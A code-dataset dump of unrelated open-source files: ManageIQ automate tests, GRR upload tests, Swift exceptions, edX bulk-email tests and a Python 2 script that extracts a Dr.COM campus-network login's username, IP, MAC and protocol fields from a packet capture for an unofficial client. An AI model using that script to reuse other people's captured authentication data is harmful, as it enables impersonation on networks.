from cfme.infrastructure.virtual_machines import InfraVmSummaryView
from cfme.markers.env_markers.provider import ONE
from cfme.provisioning import do_vm_provisioning
from cfme.utils.appliance.implementations.ui import navigate_to
from cfme.utils.generators import random_vm_name
from cfme.utils.log import logger
from cfme.utils.log_validator import LogValidator
from cfme.utils.wait import wait_for
from widgetastic_manageiq import Dropdown
pytestmark = [
test_requirements.automate,
pytest.mark.meta(server_roles="+automate"),
pytest.mark.provider([InfraProvider], required_fields=[
['provisioning', 'template'],
['provisioning', 'host'],
['provisioning', 'datastore']
], scope="module")
]
def generate_retirement_date(delta=None):
gen_date = date.today()
if delta:
gen_date += timedelta(days=delta)
return gen_date
@pytest.mark.tier(3)
@pytest.mark.parametrize('create_vm', ['small_template'], indirect=True)
def test_vm_retire_extend(appliance, request, create_vm, soft_assert):
""" Tests extending a retirement using an AE method.
Polarion:
assignee: dgaikwad
casecomponent: Automate
initialEstimate: 1/3h
setup:
1. A running VM on any provider.
testSteps:
1. It creates a button pointing to ``Request/vm_retire_extend`` instance. The button
should live in the VM and Instance button group.
2. Then it sets a retirement date for the VM
3. Then it waits until the retirement date is set
4. Then it clicks the button that was created and it waits for the retirement date to
extend.
Bugzilla:
1627758
"""
num_days = 5
soft_assert(create_vm.retirement_date == 'Never', "The retirement date is not 'Never'!")
retirement_date = generate_retirement_date(delta=num_days)
create_vm.set_retirement_date(when=retirement_date)
wait_for(lambda: create_vm.retirement_date != 'Never', message="retirement date set")
set_date = create_vm.retirement_date
vm_retire_date_fmt = create_vm.RETIRE_DATE_FMT
soft_assert(set_date == retirement_date.strftime(vm_retire_date_fmt),
"The retirement date '{}' did not match expected date '{}'"
.format(set_date, retirement_date.strftime(vm_retire_date_fmt)))
# Create the vm_retire_extend button and click on it
grp_name = fauxfactory.gen_alphanumeric(start="grp_")
grp = appliance.collections.button_groups.create(
text=grp_name,
hover=grp_name,
type=appliance.collections.button_groups.VM_INSTANCE
)
request.addfinalizer(lambda: grp.delete_if_exists())
btn_name = fauxfactory.gen_alphanumeric(start="btn_")
button = grp.buttons.create(
text=btn_name,
hover=btn_name,
system="Request",
request="vm_retire_extend"
)
request.addfinalizer(lambda: button.delete_if_exists())
navigate_to(create_vm, 'Details')
class TestDropdownView(InfraVmSummaryView):
group = Dropdown(grp.text)
view = appliance.browser.create_view(TestDropdownView)
view.group.item_select(button.text)
# CFME automate vm_retire_extend method defaults to extending the date by 14 days
extend_duration_days = 14
extended_retirement_date = retirement_date + timedelta(days=extend_duration_days)
# Check that the WebUI updates with the correct date
wait_for(
lambda: create_vm.retirement_date >= extended_retirement_date.strftime(vm_retire_date_fmt),
num_sec=60,
message="Check for extension of the VM retirement date by {} days".format(
extend_duration_days)
)
@pytest.mark.tier(3)
@pytest.mark.meta(automates=[1720432])
def test_miq_password_decrypt(appliance, klass):
"""
Polarion:
assignee: dgaikwad
casecomponent: Automate
initialEstimate: 1/3h
Bugzilla:
1720432
"""
# Ruby script for decrypting password
script = (
'require "manageiq-password"\n'
f'root_password = {appliance.password_gem}.encrypt("abc")\n'
'$evm.log("info", "Root Password is #{root_password}")\n'
f'root_password_decrypted = {appliance.password_gem}.decrypt(root_password)\n'
'$evm.log("info", "Decrypted password is #{root_password_decrypted}")'
)
# Adding schema for executing method
klass.schema.add_fields({'name': 'execute', 'type': 'Method', 'data_type': 'String'})
# Adding automate method
method = klass.methods.create(
name=fauxfactory.gen_alphanumeric(),
display_name=fauxfactory.gen_alphanumeric(),
location='inline',
script=script)
# Adding instance to call automate method
instance = klass.instances.create(
name=fauxfactory.gen_alphanumeric(),
display_name=fauxfactory.gen_alphanumeric(),
description=fauxfactory.gen_alphanumeric(),
fields={'execute': {'value': method.name}}
)
result = LogValidator(
"/var/www/miq/vmdb/log/automation.log", matched_patterns=[".*Decrypted password is abc.*"],
)
result.start_monitoring()
# Executing method via simulation to check decrypted password
simulate(
appliance=klass.appliance,
attributes_values={
"namespace": klass.namespace.name,
"class": klass.name,
"instance": instance.name,
},
message="create",
request="Call_Instance",
execute_methods=True,
)
assert result.validate()
@pytest.mark.tier(1)
@pytest.mark.customer_scenario
@pytest.mark.meta(automates=[1700524, 1753669])
def test_service_retirement_from_automate_method(request, generic_catalog_item, custom_instance):
"""
Bugzilla:
1700524
1753669
Polarion:
assignee: dgaikwad
initialEstimate: 1/8h
caseposneg: positive
startsin: 5.11
casecomponent: Automate
testSteps:
1. Create service catalog item and order
2. Create a writeable domain and copy ManageIQ/System/Request to this domain
3. Create retire_automation_service instance and set meth5 to retire_automation_service.
4. Create retire_automation_service method with sample code given below:
> service = $evm.root['service']
> $evm.log(:info, "create_retire_request for service #{service}")
> request = $evm.execute(:create_retire_request, service)
> $evm.log(:info, "Create request for create_retire_request #{request}")
5. Execute this method using simulation
expectedResults:
1. Service provision request should be provisioned successfully
2.
3.
4.
5. Service should be retired successfully
"""
# Ordering catalog item and deleting request once service has been reached to 'Finished' state
service_request = generic_catalog_item.appliance.rest_api.collections.service_templates.get(
name=generic_catalog_item.name
).action.order()
request.addfinalizer(lambda: service_request.action.delete())
wait_for(lambda: service_request.request_state == "finished", fail_func=service_request.reload,
timeout=180, delay=10)
# Ruby code to execute create_retire_request
script = dedent(
"""
service = $evm.root['service']
        $evm.log(:info, "create_retire_request for service #{service}")
        request = $evm.execute(:create_retire_request, service)
        $evm.log(:info, "Create request for create_retire_request #{request}")
"""
)
instance = custom_instance(ruby_code=script)
with LogValidator(
"/var/www/miq/vmdb/log/automation.log",
matched_patterns=['.*Create request for create_retire_request.*']).waiting(timeout=120):
# Executing automate method
simulate(
appliance=generic_catalog_item.appliance,
target_type="Service",
target_object=f"{generic_catalog_item.name}",
message="create",
request=f"{instance.name}",
execute_methods=True,
)
retire_request = generic_catalog_item.appliance.rest_api.collections.requests.get(
description=f"Service Retire for: {generic_catalog_item.name}")
wait_for(lambda: retire_request.request_state == "finished", fail_func=retire_request.reload,
timeout=180, delay=10)
@pytest.fixture
def set_root_tenant_quota(request, appliance):
field, value = request.param
root_tenant = appliance.collections.tenants.get_root_tenant()
view = navigate_to(root_tenant, "ManageQuotas")
reset_data = view.form.read()
root_tenant.set_quota(**{f'{field}_cb': True, field: value})
yield
root_tenant.set_quota(**reset_data)
@pytest.mark.tier(3)
@pytest.mark.meta(automates=[1334318])
@pytest.mark.provider([RHEVMProvider], selector=ONE)
@pytest.mark.parametrize(
"set_root_tenant_quota", [("memory", "1000")], indirect=["set_root_tenant_quota"],
ids=["memory"]
)
def test_automate_quota_units(setup_provider, provider, request, appliance, set_root_tenant_quota,
provisioning):
"""
Bugzilla:
1334318
Polarion:
assignee: dgaikwad
casecomponent: Automate
caseimportance: low
initialEstimate: 1/4h
tags: automate
"""
vm_name = random_vm_name(context='quota')
prov_data = {
"catalog": {'vm_name': vm_name},
"environment": {'automatic_placement': True},
"network": {'vlan': partial_match(provisioning['vlan'])},
'hardware': {'memory': '2048'},
}
@request.addfinalizer
def _finalize():
collection = appliance.provider_based_collection(provider)
vm_obj = collection.instantiate(vm_name, provider, provisioning["template"])
try:
vm_obj.cleanup_on_provider()
except Exception:
logger.warning('Failed deleting VM from provider: %s', vm_name)
with LogValidator(
"/var/www/miq/vmdb/log/automation.log",
matched_patterns=['.*Getting Tenant Quota Values for:.*.memory=>1073741824000.*'],
).waiting(timeout=120):
# Provisioning VM via lifecycle
do_vm_provisioning(appliance, template_name=provisioning["template"], provider=provider,
vm_name=vm_name, provisioning_data=prov_data, wait=False, request=None)
# nav to requests page to check quota validation
request_description = f'Provision from [{provisioning["template"]}] to [{vm_name}]'
provision_request = appliance.collections.requests.instantiate(request_description)
provision_request.wait_for_request(method='ui')
assert provision_request.is_succeeded(
method="ui"
), f"Provisioning failed: {provision_request.row.last_message.text}"
@pytest.fixture(scope="function")
def vm_folder(provider):
"""Create Vm folder on VMWare provider"""
folder = provider.mgmt.create_folder(fauxfactory.gen_alphanumeric(
start="test_folder_", length=20)
)
yield folder
fd = folder.Destroy()
wait_for(lambda: fd.info.state == 'success', delay=10, timeout=150)
@pytest.mark.tier(3)
@pytest.mark.ignore_stream("5.10")
@pytest.mark.provider([VMwareProvider], selector=ONE)
@pytest.mark.meta(automates=[1716858])
@pytest.mark.parametrize('create_vm', ['small_template'], indirect=True)
def test_move_vm_into_folder(appliance, vm_folder, create_vm, custom_instance):
"""
Bugzilla:
1716858
Polarion:
assignee: dgaikwad
casecomponent: Automate
initialEstimate: 1/4h
tags: automate
"""
script = dedent(
f"""
vm = $evm.vmdb('vm').find_by_name('{create_vm.name}')
folder = $evm.vmdb('EmsFolder').find_by(:name => '{vm_folder.name}')
vm.move_into_folder(folder) unless folder.nil?
"""
)
instance = custom_instance(ruby_code=script)
view = navigate_to(create_vm, "Details")
tree_path = view.sidebar.vmstemplates.tree.currently_selected
simulate(
appliance=appliance,
attributes_values={
"namespace": instance.klass.namespace.name,
"class": instance.klass.name,
"instance": instance.name,
},
message="create",
request="Call_Instance",
execute_methods=True,
)
# manipulate tree path. Remove folder - 'Templates' and append with vm_folder name
tree_path.pop()
tree_path.append(vm_folder.name)
# Navigating to Vms details page and checking folder of the Vm in accordion of CFME UI
view = navigate_to(create_vm, "Details")
# Checking new folder appeared
def _check():
try:
view.sidebar.vmstemplates.tree.fill(tree_path)
return True
except CandidateNotFound:
return False
    wait_for(_check, fail_func=view.browser.refresh, timeout=600, delay=5,
message="Waiting for vm folder name to appear")
@pytest.mark.tier(1)
@pytest.mark.meta(automates=[1574444])
@pytest.mark.provider([VMwareProvider], selector=ONE)
def test_list_of_diff_vm_storages_via_rails(appliance, setup_provider, provider, testing_vm,
custom_instance):
"""
Bugzilla:
1574444
Polarion:
assignee: dgaikwad
initialEstimate: 1/8h
caseimportance: medium
caseposneg: positive
testtype: functional
startsin: 5.9
casecomponent: Automate
testSteps:
1. vmware = $evm.vmdb('ems').find_by_name('vmware 6.5 (nested)') ;
2. vm = vmware.vms.select { |v| v.name == 'dgaikwad-cfme510' }.first ;
3. vm.storage
4. vm.storages
expectedResults:
1.
2.
3. Returns only one storage
4. Returns available storages
"""
list_storages = dedent(
f'vmware = $evm.vmdb("ems").find_by_name("{provider.name}")\n'
'vm = vmware.vms.select {|v| v.name == '
f'"{testing_vm.name}"'
'}.first\n'
'storage = vm.storage\n'
'storage_name = storage.name\n'
'$evm.log(:info, "storage name: #{storage_name}")\n'
'storages = vm.storages\n'
'storage_name = storages[0].name\n'
'$evm.log(:info, "storages name: #{storage_name}")\n'
)
instance = custom_instance(ruby_code=list_storages)
with LogValidator(
"/var/www/miq/vmdb/log/automation.log",
matched_patterns=[
f".*storage name: {testing_vm.datastore.name}.*",
f".*storages name: {testing_vm.datastore.name}.*",
],
).waiting(timeout=120):
# Executing automate method using simulation
simulate(
appliance=appliance,
message="create",
request="Call_Instance",
execute_methods=True,
attributes_values={
"namespace": instance.klass.namespace.name,
"class": instance.klass.name,
"instance": instance.name,
},
)
| gpl-2.0 | -4,176,466,714,598,073,300 | 35.054422 | 100 | 0.641006 | false |
googleinterns/stampify | extraction/content_extractors/embedded_instagram_post_extractor.py | 1 | 1491 | """This script checks whether DOM has embedded instagram
post tag or not and creates and returns the EInstagramPost object"""
from urllib.parse import urlparse
import bs4
from data_models.embedded_instagram_post import EInstagramPost
from extraction.content_extractors.interface_content_extractor import \
IContentExtractor
class EInstagramPostExtractor(IContentExtractor):
"""This class inherits IContentExtractor for extracting
embedded instagram post"""
def validate_and_extract(self, node: bs4.element):
"""Validates if a tag is instagram post tag and
returns the extracted data from the tag in EInstagramPost object"""
if isinstance(node, bs4.element.Tag):
if node.has_attr('class') \
and ('instagram-media' in node['class']
or 'instagram-media-rendered' in node['class']):
return EInstagramPost(self.
__get_instagram_shortcode
(node.find('a')['href']))
if node.name == 'iframe' \
and node.has_attr('src') \
and node['src'].startswith('https://instagram.com/'):
return EInstagramPost(self.
__get_instagram_shortcode
(node['src']))
return None
@staticmethod
def __get_instagram_shortcode(url):
return urlparse(url)[2].split('/')[2]
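# A small illustrative helper (the markup below is invented, not a real
# Instagram embed): parses a fragment with bs4 and runs the extractor on the
# resulting blockquote tag; the expected shortcode is 'ABC123xyz'.
def _example_extraction():
    markup = ('<blockquote class="instagram-media">'
              '<a href="https://www.instagram.com/p/ABC123xyz/">post</a>'
              '</blockquote>')
    soup = bs4.BeautifulSoup(markup, 'html.parser')
    return EInstagramPostExtractor().validate_and_extract(soup.blockquote)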
| apache-2.0 | -1,494,846,459,844,300,800 | 36.275 | 75 | 0.589537 | false |
google/grr | grr/client/grr_response_client/gcs_test.py | 1 | 7459 | #!/usr/bin/env python
import io
import time
from unittest import mock
from absl.testing import absltest
import portpicker
from requests import exceptions
import responses
from grr_response_client import gcs
from grr.test_lib import gcs_test_lib
class UploadSessionTest(absltest.TestCase):
def testOpenIncorrectURL(self):
unused_port = portpicker.pick_unused_port()
with self.assertRaises(gcs.RequestError) as context:
gcs.UploadSession.Open(f"https://localhost:{unused_port}")
cause = context.exception.__cause__
self.assertIsInstance(cause, exceptions.ConnectionError)
@responses.activate
def testOpenIncorrectResponseStatus(self):
responses.add(responses.POST, "https://foo.bar/quux", status=404)
with self.assertRaisesRegex(gcs.ResponseError, "Unexpected status"):
gcs.UploadSession.Open("https://foo.bar/quux")
@responses.activate
def testOpenIncorrectResponseHeader(self):
responses.add(responses.POST, "https://foo.bar/quux", status=201)
with self.assertRaisesRegex(gcs.ResponseError, "Missing session URI"):
gcs.UploadSession.Open("https://foo.bar/quux")
@responses.activate
def testOpen(self):
response = responses.Response(responses.POST, "https://foo.bar/quux")
response.status = 201
response.headers = {
"Location": "https://quux.thud/blargh",
}
responses.add(response)
session = gcs.UploadSession.Open("https://foo.bar/quux")
self.assertEqual(session.uri, "https://quux.thud/blargh")
def testSendFileTransmissionFailure(self):
unused_port = portpicker.pick_unused_port()
session = gcs.UploadSession(f"https://localhost:{unused_port}")
opts = gcs.UploadSession.Opts()
opts.retry_chunk_attempts = 1
opts.retry_chunk_init_delay = 0.0
with self.assertRaises(gcs.RequestError) as context:
session.SendFile(io.BytesIO(b"foobar"), opts=opts)
cause = context.exception.__cause__
self.assertIsInstance(cause, exceptions.ConnectionError)
@responses.activate
def testSendFileInterrupted(self):
responses.add(responses.PUT, "https://foo.bar/quux", status=503)
opts = gcs.UploadSession.Opts()
opts.retry_chunk_attempts = 1
opts.retry_chunk_init_delay = 0.0
session = gcs.UploadSession("https://foo.bar/quux")
with self.assertRaises(gcs.InterruptedResponseError):
session.SendFile(io.BytesIO(b"foobar"), opts=opts)
@responses.activate
def testSendFileCancelledUpload(self):
responses.add(responses.PUT, "https://foo.bar/quux", status=499)
session = gcs.UploadSession("https://foo.bar/quux")
with self.assertRaises(gcs.ResponseError):
session.SendFile(io.BytesIO(b"foobar"))
@responses.activate
def testSendFileIncorrectResponseLastChunk(self):
responses.add(responses.PUT, "https://foo.bar/quux", status=301)
session = gcs.UploadSession("https://foo.bar/quux")
opts = gcs.UploadSession.Opts()
opts.chunk_size = 1024
with self.assertRaisesRegex(gcs.ResponseError, "final chunk"):
session.SendFile(io.BytesIO(b"foobar"), opts=opts)
@responses.activate
def testSendFileIncorrectResponseIntermediateChunk(self):
responses.add(responses.PUT, "https://foo.bar/quux", status=301)
session = gcs.UploadSession("https://foo.bar/quux")
opts = gcs.UploadSession.Opts()
opts.chunk_size = 1
with self.assertRaisesRegex(gcs.ResponseError, "mid chunk"):
session.SendFile(io.BytesIO(b"foobar"), opts=opts)
@responses.activate
def testSendFileEmpty(self):
handler = gcs_test_lib.FakeUploadHandler()
responses.add_callback(responses.PUT, "https://foo.bar/qux", handler)
session = gcs.UploadSession("https://foo.bar/qux")
session.SendFile(io.BytesIO(b""))
self.assertEqual(handler.content, b"")
@responses.activate
def testSendFileSingleChunk(self):
handler = gcs_test_lib.FakeUploadHandler()
responses.add_callback(responses.PUT, "https://foo.bar/qux", handler)
content = b"foobar"
opts = gcs.UploadSession.Opts()
opts.chunk_size = len(content)
session = gcs.UploadSession("https://foo.bar/qux")
session.SendFile(io.BytesIO(content), opts=opts)
self.assertEqual(handler.content, content)
@responses.activate
def testSendFileMultipleChunks(self):
handler = gcs_test_lib.FakeUploadHandler()
responses.add_callback(responses.PUT, "https://foo.bar/qux", handler)
opts = gcs.UploadSession.Opts()
opts.chunk_size = 1
session = gcs.UploadSession("https://foo.bar/qux")
session.SendFile(io.BytesIO(b"foobar"), opts=opts)
self.assertEqual(handler.content, b"foobar")
@responses.activate
def testSendFileRetrySuccess(self):
handler = gcs_test_lib.FakeUploadHandler()
responses.add(responses.PUT, "https://foo.bar/qux", status=502)
responses.add(responses.PUT, "https://foo.bar/qux", status=503)
responses.add(responses.PUT, "https://foo.bar/qux", status=504)
responses.add_callback(responses.PUT, "https://foo.bar/qux", handler)
opts = gcs.UploadSession.Opts()
opts.chunk_size = 1
opts.retry_chunk_attempts = 4
opts.retry_chunk_init_delay = 0.0
session = gcs.UploadSession("https://foo.bar/qux")
session.SendFile(io.BytesIO(b"foobar"), opts=opts)
self.assertEqual(handler.content, b"foobar")
@responses.activate
def testSendFileRetryFailure(self):
handler = gcs_test_lib.FakeUploadHandler()
responses.add(responses.PUT, "https://foo.bar/qux", status=502)
responses.add(responses.PUT, "https://foo.bar/qux", status=503)
responses.add(responses.PUT, "https://foo.bar/qux", status=504)
responses.add_callback(responses.PUT, "https://foo.bar/qux", handler)
opts = gcs.UploadSession.Opts()
opts.chunk_size = 1
opts.retry_chunk_attempts = 3
opts.retry_chunk_init_delay = 0.0
session = gcs.UploadSession("https://foo.bar/qux")
with self.assertRaises(gcs.InterruptedResponseError) as context:
session.SendFile(io.BytesIO(b"foobar"), opts=opts)
self.assertEqual(context.exception.response.status_code, 504)
@responses.activate
def testSendFileChunkProgress(self):
data = b"foobar"
handler = gcs_test_lib.FakeUploadHandler()
responses.add_callback(responses.PUT, "https://foo.bar/qux", handler)
counter = 0
def Progress() -> None:
nonlocal counter
counter += 1
opts = gcs.UploadSession.Opts()
opts.chunk_size = 1
opts.progress_callback = Progress
session = gcs.UploadSession("https://foo.bar/qux")
session.SendFile(io.BytesIO(data), opts=opts)
self.assertGreaterEqual(counter, len(data))
@responses.activate
@mock.patch.object(time, "sleep", lambda _: None)
def testSendFileRetryProgress(self):
responses.add(responses.PUT, "https://foo.bar/qux", status=503)
counter = 0
def Progress() -> None:
nonlocal counter
counter += 1
opts = gcs.UploadSession.Opts()
opts.retry_chunk_attempts = 2
opts.retry_chunk_init_delay = 10.0
opts.progress_interval = 1.0
opts.progress_callback = Progress
session = gcs.UploadSession("https://foo.bar/qux")
with self.assertRaises(gcs.InterruptedResponseError):
session.SendFile(io.BytesIO(b"foobar"), opts=opts)
# We should sleep for 10 seconds and do progress calls every second, so it
# should be called at least 10 times.
self.assertGreaterEqual(counter, 10)
if __name__ == "__main__":
absltest.main()
| apache-2.0 | 7,925,162,750,375,830,000 | 30.209205 | 78 | 0.70787 | false |
CLVsol/odoo_addons | clv_insured_mng/role/__init__.py | 5 | 1423 | # -*- encoding: utf-8 -*-
################################################################################
# #
# Copyright (C) 2013-Today Carlos Eduardo Vercelino - CLVsol #
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU Affero General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU Affero General Public License for more details. #
# #
# You should have received a copy of the GNU Affero General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
################################################################################
import clv_insured
| agpl-3.0 | 442,853,416,153,108,030 | 70.15 | 80 | 0.406887 | false |
clayg/swift | swift/common/exceptions.py | 6 | 5464 | # Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from eventlet import Timeout
import swift.common.utils
class MessageTimeout(Timeout):
def __init__(self, seconds=None, msg=None):
Timeout.__init__(self, seconds=seconds)
self.msg = msg
def __str__(self):
return '%s: %s' % (Timeout.__str__(self), self.msg)
class SwiftException(Exception):
pass
class PutterConnectError(Exception):
def __init__(self, status=None):
self.status = status
class InvalidTimestamp(SwiftException):
pass
class InsufficientStorage(SwiftException):
pass
class FooterNotSupported(SwiftException):
pass
class MultiphasePUTNotSupported(SwiftException):
pass
class SuffixSyncError(SwiftException):
pass
class RangeAlreadyComplete(SwiftException):
pass
class DiskFileError(SwiftException):
pass
class DiskFileNotOpen(DiskFileError):
pass
class DiskFileQuarantined(DiskFileError):
pass
class DiskFileCollision(DiskFileError):
pass
class DiskFileNotExist(DiskFileError):
pass
class DiskFileDeleted(DiskFileNotExist):
def __init__(self, metadata=None):
self.metadata = metadata or {}
self.timestamp = swift.common.utils.Timestamp(
self.metadata.get('X-Timestamp', 0))
class DiskFileExpired(DiskFileDeleted):
pass
class DiskFileNoSpace(DiskFileError):
pass
class DiskFileDeviceUnavailable(DiskFileError):
pass
class DiskFileXattrNotSupported(DiskFileError):
pass
class DeviceUnavailable(SwiftException):
pass
class InvalidAccountInfo(SwiftException):
pass
class PathNotDir(OSError):
pass
class ChunkReadError(SwiftException):
pass
class ChunkReadTimeout(Timeout):
pass
class ChunkWriteTimeout(Timeout):
pass
class ConnectionTimeout(Timeout):
pass
class ResponseTimeout(Timeout):
pass
class DriveNotMounted(SwiftException):
pass
class LockTimeout(MessageTimeout):
pass
class RingLoadError(SwiftException):
pass
class RingBuilderError(SwiftException):
pass
class RingValidationError(RingBuilderError):
pass
class EmptyRingError(RingBuilderError):
pass
class DuplicateDeviceError(RingBuilderError):
pass
class UnPicklingError(SwiftException):
pass
class FileNotFoundError(SwiftException):
pass
class PermissionError(SwiftException):
pass
class ListingIterError(SwiftException):
pass
class ListingIterNotFound(ListingIterError):
pass
class ListingIterNotAuthorized(ListingIterError):
def __init__(self, aresp):
self.aresp = aresp
class SegmentError(SwiftException):
pass
class ReplicationException(Exception):
pass
class ReplicationLockTimeout(LockTimeout):
pass
class MimeInvalid(SwiftException):
pass
class APIVersionError(SwiftException):
pass
class EncryptionException(SwiftException):
pass
class ClientException(Exception):
def __init__(self, msg, http_scheme='', http_host='', http_port='',
http_path='', http_query='', http_status=None, http_reason='',
http_device='', http_response_content='', http_headers=None):
super(ClientException, self).__init__(msg)
self.msg = msg
self.http_scheme = http_scheme
self.http_host = http_host
self.http_port = http_port
self.http_path = http_path
self.http_query = http_query
self.http_status = http_status
self.http_reason = http_reason
self.http_device = http_device
self.http_response_content = http_response_content
self.http_headers = http_headers or {}
def __str__(self):
a = self.msg
b = ''
if self.http_scheme:
b += '%s://' % self.http_scheme
if self.http_host:
b += self.http_host
if self.http_port:
b += ':%s' % self.http_port
if self.http_path:
b += self.http_path
if self.http_query:
b += '?%s' % self.http_query
if self.http_status:
if b:
b = '%s %s' % (b, self.http_status)
else:
b = str(self.http_status)
if self.http_reason:
if b:
b = '%s %s' % (b, self.http_reason)
else:
b = '- %s' % self.http_reason
if self.http_device:
if b:
b = '%s: device %s' % (b, self.http_device)
else:
b = 'device %s' % self.http_device
if self.http_response_content:
if len(self.http_response_content) <= 60:
b += ' %s' % self.http_response_content
else:
b += ' [first 60 chars of response] %s' \
% self.http_response_content[:60]
return b and '%s: %s' % (a, b) or a
class InvalidPidFileException(Exception):
pass
| apache-2.0 | 5,727,988,254,764,160,000 | 18.941606 | 79 | 0.644949 | false |
mchome/drcom-generic | drcom_d_config.py | 1 | 1705 | # -*- coding: utf-8 -*-
"""
Created on Wed Dec 03 23:45:49 2014
@author: latyas
"""
from binascii import hexlify
import re
def hexed(s):
ret = ''
for i in s:
ret += '\\x' + hex(ord(i))[2:].rjust(2, '0')
return ret
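# Illustrative example: hexed('\x01A') returns the literal text '\x01\x41',
# i.e. backslash escapes spelled out as characters, ready to paste into the
# generated config statements below.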
filename = '998'
f = open(filename, 'rb')
text = f.read()
offset = re.search('\xf0\x00\xf0\x00[\x00-\xFF]{4}[\x03\x07]\x01', text).start() + 8
#print hexlify(text[offset:offset+330])
print 'pcapng file:', filename
print 'copy following statements to drcom.conf or overwrite field between "# CONFIG" and "# CONFIG_END" in latest-wired.py'
print '\n'
username_len = ord(text[offset+3]) - 20
username = text[offset+20:offset+20+username_len]
print 'server = \'%s\'' % '.'.join([str(ord(i)) for i in text[offset-12:offset-8]])
print 'username=\'%s\'' % username
print 'password=\'\''
print 'CONTROLCHECKSTATUS = \'%s\'' % hexed(text[offset+56])
print 'ADAPTERNUM = \'%s\'' % hexed(text[offset+57])
print 'host_ip = \'%s\'' % '.'.join(map(lambda x: str(ord(x)), text[offset+81:offset+85]))
print 'IPDOG = \'%s\'' % hexed(text[offset+105])
print 'host_name = \'%s\'' % 'DRCOMFUCKER'
print 'PRIMARY_DNS = \'%s\'' % '.'.join(map(lambda x: str(ord(x)), text[offset+142 :offset+146]))
print 'dhcp_server = \'%s\'' % '.'.join(map(lambda x: str(ord(x)), text[offset+146:offset+150]))
print 'AUTH_VERSION = \'%s\'' % hexed(text[offset+310:offset+312])
print 'mac = 0x%s' % hexlify(text[offset+320:offset+326])
print 'host_os = \'%s\'' % 'WINDIAOS'
# now get the version field in heartbeat
KEEP_ALIVE_VERSION = [i for i in re.findall('\xf0\x00\xf0\x00....\x07.\x5c\x28\x00\x0b\x01(..)', text) if i != '\x0f\x27'][0]
print 'KEEP_ALIVE_VERSION = \'%s\'' % hexed(KEEP_ALIVE_VERSION)
| agpl-3.0 | -2,382,771,327,867,114,000 | 38.651163 | 125 | 0.629912 | false |
hmcmooc/muddx-platform | lms/djangoapps/bulk_email/tests/test_models.py | 3 | 5892 | """
Unit tests for bulk-email-related models.
"""
from django.test import TestCase
from django.core.management import call_command
from django.conf import settings
from student.tests.factories import UserFactory
from mock import patch
from bulk_email.models import CourseEmail, SEND_TO_STAFF, CourseEmailTemplate, CourseAuthorization
from xmodule.modulestore.locations import SlashSeparatedCourseKey
class CourseEmailTest(TestCase):
"""Test the CourseEmail model."""
def test_creation(self):
course_id = SlashSeparatedCourseKey('abc', '123', 'doremi')
sender = UserFactory.create()
to_option = SEND_TO_STAFF
subject = "dummy subject"
html_message = "<html>dummy message</html>"
email = CourseEmail.create(course_id, sender, to_option, subject, html_message)
self.assertEquals(email.course_id, course_id)
self.assertEquals(email.to_option, SEND_TO_STAFF)
self.assertEquals(email.subject, subject)
self.assertEquals(email.html_message, html_message)
self.assertEquals(email.sender, sender)
def test_bad_to_option(self):
course_id = SlashSeparatedCourseKey('abc', '123', 'doremi')
sender = UserFactory.create()
to_option = "fake"
subject = "dummy subject"
html_message = "<html>dummy message</html>"
with self.assertRaises(ValueError):
CourseEmail.create(course_id, sender, to_option, subject, html_message)
class NoCourseEmailTemplateTest(TestCase):
"""Test the CourseEmailTemplate model without loading the template data."""
def test_get_missing_template(self):
with self.assertRaises(CourseEmailTemplate.DoesNotExist):
CourseEmailTemplate.get_template()
class CourseEmailTemplateTest(TestCase):
"""Test the CourseEmailTemplate model."""
def setUp(self):
# load initial content (since we don't run migrations as part of tests):
call_command("loaddata", "course_email_template.json")
def _get_sample_plain_context(self):
"""Provide sample context sufficient for rendering plaintext template"""
context = {
'course_title': "Bogus Course Title",
'course_url': "/location/of/course/url",
'account_settings_url': "/location/of/account/settings/url",
'platform_name': 'edX',
'email': '[email protected]',
}
return context
def _get_sample_html_context(self):
"""Provide sample context sufficient for rendering HTML template"""
context = self._get_sample_plain_context()
context['course_image_url'] = "/location/of/course/image/url"
return context
def test_get_template(self):
template = CourseEmailTemplate.get_template()
self.assertIsNotNone(template.html_template)
self.assertIsNotNone(template.plain_template)
def test_render_html_without_context(self):
template = CourseEmailTemplate.get_template()
base_context = self._get_sample_html_context()
for keyname in base_context:
context = dict(base_context)
del context[keyname]
with self.assertRaises(KeyError):
template.render_htmltext("My new html text.", context)
def test_render_plaintext_without_context(self):
template = CourseEmailTemplate.get_template()
base_context = self._get_sample_plain_context()
for keyname in base_context:
context = dict(base_context)
del context[keyname]
with self.assertRaises(KeyError):
template.render_plaintext("My new plain text.", context)
def test_render_html(self):
template = CourseEmailTemplate.get_template()
context = self._get_sample_html_context()
template.render_htmltext("My new html text.", context)
def test_render_plain(self):
template = CourseEmailTemplate.get_template()
context = self._get_sample_plain_context()
template.render_plaintext("My new plain text.", context)
class CourseAuthorizationTest(TestCase):
"""Test the CourseAuthorization model."""
@patch.dict(settings.FEATURES, {'REQUIRE_COURSE_EMAIL_AUTH': True})
def test_creation_auth_on(self):
course_id = SlashSeparatedCourseKey('abc', '123', 'doremi')
# Test that course is not authorized by default
self.assertFalse(CourseAuthorization.instructor_email_enabled(course_id))
# Authorize
cauth = CourseAuthorization(course_id=course_id, email_enabled=True)
cauth.save()
# Now, course should be authorized
self.assertTrue(CourseAuthorization.instructor_email_enabled(course_id))
self.assertEquals(
cauth.__unicode__(),
"Course 'abc/123/doremi': Instructor Email Enabled"
)
# Unauthorize by explicitly setting email_enabled to False
cauth.email_enabled = False
cauth.save()
# Test that course is now unauthorized
self.assertFalse(CourseAuthorization.instructor_email_enabled(course_id))
self.assertEquals(
cauth.__unicode__(),
"Course 'abc/123/doremi': Instructor Email Not Enabled"
)
@patch.dict(settings.FEATURES, {'REQUIRE_COURSE_EMAIL_AUTH': False})
def test_creation_auth_off(self):
